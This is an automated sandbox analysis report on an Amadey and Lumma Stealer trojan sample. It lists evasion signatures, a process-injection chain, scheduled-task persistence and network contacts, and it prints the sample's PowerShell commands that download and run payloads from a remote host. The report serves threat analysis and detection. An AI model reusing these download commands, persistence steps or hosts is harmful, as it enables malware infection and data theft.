Malware Analysis Report

2024-11-30 05:12

Sample ID 240519-xg1r5sce9t
Target 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb
SHA256 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb
Tags
amadey lumma c767c0 discovery evasion execution stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb

Threat Level: Known bad

The file 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb was found to be: Known bad.

Malicious Activity Summary

amadey lumma c767c0 discovery evasion execution stealer trojan

Amadey

Lumma Stealer

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Blocklisted process makes network request

Checks computer location settings

Checks BIOS information in registry

Identifies Wine through registry keys

Loads dropped DLL

Executes dropped EXE

Checks installed software on the system

Looks up external IP address via web service

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Windows directory

Drops file in Program Files directory

Command and Scripting Interpreter: PowerShell

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

Script User-Agent

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-19 18:50

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-19 18:50

Reported

2024-05-19 18:52

Platform

win10v2004-20240426-en

Max time kernel

143s

Max time network

129s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe"

Signatures

Amadey

trojan amadey

Lumma Stealer

stealer lumma

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.amazonaws.com N/A N/A
N/A checkip.amazonaws.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\shlwapi_p.dll C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3680 set thread context of 1436 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\Application\dlls\Shlwapi.dll C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp N/A
File created C:\Program Files\Google\Chrome\Application\Extensions\updates.xml C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp N/A
File opened for modification C:\Program Files\Online Security\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp N/A
File created C:\Program Files\scoped_dir4984_1382533742\extension.zip C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\dlls\dlls.manifest C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\Extensions\security.crx C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\Extensions\updates.xml C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp N/A
File created C:\Program Files\Online Security\is-JCPNV.tmp C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp N/A
File created C:\Program Files\Google\Chrome\Application\chrome.exe.manifest C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp N/A
File created C:\Program Files\Google\Chrome\Application\dlls\dlls.manifest C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp N/A
File opened for modification C:\Program Files\Google\Chrome\Application\dlls\dlls.manifest C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.manifest C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp N/A
File created C:\Program Files\Google\Chrome\Application\Extensions\security.crx C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\dlls\Shlwapi.dll C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp N/A
File created C:\Program Files\Online Security\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\axplons.job C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3740 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
PID 3740 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
PID 3740 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
PID 3112 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
PID 3112 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
PID 3112 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
PID 2896 wrote to memory of 3768 N/A C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe C:\Windows\SysWOW64\schtasks.exe
PID 2896 wrote to memory of 3768 N/A C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe C:\Windows\SysWOW64\schtasks.exe
PID 2896 wrote to memory of 3768 N/A C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe C:\Windows\SysWOW64\schtasks.exe
PID 2896 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe
PID 2896 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe
PID 2896 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe
PID 3112 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe
PID 3112 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe
PID 3112 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe
PID 3680 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3680 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3680 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3680 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3680 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3680 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3680 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3680 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3680 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2040 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe C:\Windows\SysWOW64\cmd.exe
PID 2040 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe C:\Windows\SysWOW64\cmd.exe
PID 2040 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe C:\Windows\SysWOW64\cmd.exe
PID 2876 wrote to memory of 4916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 4916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 4916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 3000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 3000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 3000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 3672 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i0.exe
PID 2876 wrote to memory of 3672 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i0.exe
PID 2876 wrote to memory of 3672 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i0.exe
PID 2876 wrote to memory of 4548 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 4548 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 4548 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\i0.exe C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp
PID 3672 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\i0.exe C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp
PID 3672 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\i0.exe C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp
PID 5076 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp C:\Windows\system32\cmd.exe
PID 5076 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp C:\Windows\system32\cmd.exe
PID 1204 wrote to memory of 4984 N/A C:\Windows\system32\cmd.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1204 wrote to memory of 4984 N/A C:\Windows\system32\cmd.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4984 wrote to memory of 4916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4984 wrote to memory of 4916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5076 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp C:\Windows\system32\cmd.exe
PID 5076 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp C:\Windows\system32\cmd.exe
PID 5076 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp C:\Windows\system32\cmd.exe
PID 5076 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp C:\Windows\system32\cmd.exe
PID 5076 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp C:\Windows\SYSTEM32\taskkill.exe
PID 5076 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp C:\Windows\SYSTEM32\taskkill.exe
PID 5076 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp C:\Windows\SYSTEM32\taskkill.exe
PID 5076 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp C:\Windows\SYSTEM32\taskkill.exe

Processes

C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe

"C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe"

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"

C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe

"C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe" /F

C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe

"C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe"

C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe

"C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsm4C6C.tmp\abc.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002','stat')"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1002','i0.exe')"

C:\Users\Admin\AppData\Local\Temp\i0.exe

i0.exe /verysilent /sub=1000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=444&c=1002', 'i2.bat')"

C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp

"C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp" /SL5="$130042,2859366,899584,C:\Users\Admin\AppData\Local\Temp\i0.exe" /verysilent /sub=1000

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\xbweti > "C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\~execwithresult.txt""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\xbweti

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x104,0x108,0x10c,0xdc,0x110,0x7ffd3f3dab58,0x7ffd3f3dab68,0x7ffd3f3dab78

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""openssl.exe" rsa -in .\xbweti.pem -pubout -outform DER > "C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\~execwithresult.txt""

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\dhglhc > "C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\~execwithresult.txt""

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /f /im "msedge.exe"

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /f /im "chrome.exe"

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe

C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe

C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
RU 5.42.96.7:80 5.42.96.7 tcp
NL 23.62.61.97:443 www.bing.com tcp
DE 185.172.128.19:80 185.172.128.19 tcp
DE 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 7.96.42.5.in-addr.arpa udp
US 8.8.8.8:53 19.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 d2csnxzxwctx26.cloudfront.net udp
GB 18.244.183.212:443 d2csnxzxwctx26.cloudfront.net tcp
US 8.8.8.8:53 212.183.244.18.in-addr.arpa udp
US 8.8.8.8:53 145.178.204.143.in-addr.arpa udp
US 8.8.8.8:53 113.216.138.108.in-addr.arpa udp
US 8.8.8.8:53 roomabolishsnifftwk.shop udp
US 172.67.146.92:443 roomabolishsnifftwk.shop tcp
US 8.8.8.8:53 museumtespaceorsp.shop udp
US 172.67.184.107:443 museumtespaceorsp.shop tcp
US 8.8.8.8:53 92.146.67.172.in-addr.arpa udp
US 8.8.8.8:53 buttockdecarderwiso.shop udp
US 104.21.45.202:443 buttockdecarderwiso.shop tcp
US 8.8.8.8:53 averageaattractiionsl.shop udp
US 172.67.220.163:443 averageaattractiionsl.shop tcp
US 8.8.8.8:53 d22hce23hy1ej9.cloudfront.net udp
GB 13.224.246.147:443 d22hce23hy1ej9.cloudfront.net tcp
US 8.8.8.8:53 femininiespywageg.shop udp
US 104.21.71.3:443 femininiespywageg.shop tcp
US 8.8.8.8:53 202.45.21.104.in-addr.arpa udp
US 8.8.8.8:53 107.184.67.172.in-addr.arpa udp
US 8.8.8.8:53 163.220.67.172.in-addr.arpa udp
US 8.8.8.8:53 employhabragaomlsp.shop udp
US 172.67.203.218:443 employhabragaomlsp.shop tcp
US 8.8.8.8:53 stalfbaclcalorieeis.shop udp
US 172.67.131.36:443 stalfbaclcalorieeis.shop tcp
GB 13.224.246.147:443 d22hce23hy1ej9.cloudfront.net tcp
US 8.8.8.8:53 3.71.21.104.in-addr.arpa udp
US 8.8.8.8:53 218.203.67.172.in-addr.arpa udp
US 8.8.8.8:53 147.246.224.13.in-addr.arpa udp
US 8.8.8.8:53 cdn-edge-node.com udp
US 172.67.165.254:443 cdn-edge-node.com tcp
US 8.8.8.8:53 civilianurinedtsraov.shop udp
US 172.67.197.146:443 civilianurinedtsraov.shop tcp
US 8.8.8.8:53 36.131.67.172.in-addr.arpa udp
US 8.8.8.8:53 146.197.67.172.in-addr.arpa udp
US 8.8.8.8:53 adblock2024.shop udp
US 104.21.43.83:443 adblock2024.shop tcp
US 8.8.8.8:53 254.165.67.172.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
GB 13.224.246.147:443 d22hce23hy1ej9.cloudfront.net tcp
US 8.8.8.8:53 240429000936002.mjt.kqri92.top udp
BG 94.156.35.76:80 240429000936002.mjt.kqri92.top tcp
US 8.8.8.8:53 83.43.21.104.in-addr.arpa udp
US 8.8.8.8:53 checkip.amazonaws.com udp
IE 52.211.130.173:443 checkip.amazonaws.com tcp
US 8.8.8.8:53 76.35.156.94.in-addr.arpa udp
US 8.8.8.8:53 rep.pe-wok.biz udp
SE 46.21.101.120:80 rep.pe-wok.biz tcp
US 8.8.8.8:53 173.130.211.52.in-addr.arpa udp
US 8.8.8.8:53 120.101.21.46.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/3740-0-0x0000000000690000-0x0000000000B62000-memory.dmp

memory/3740-1-0x0000000077434000-0x0000000077436000-memory.dmp

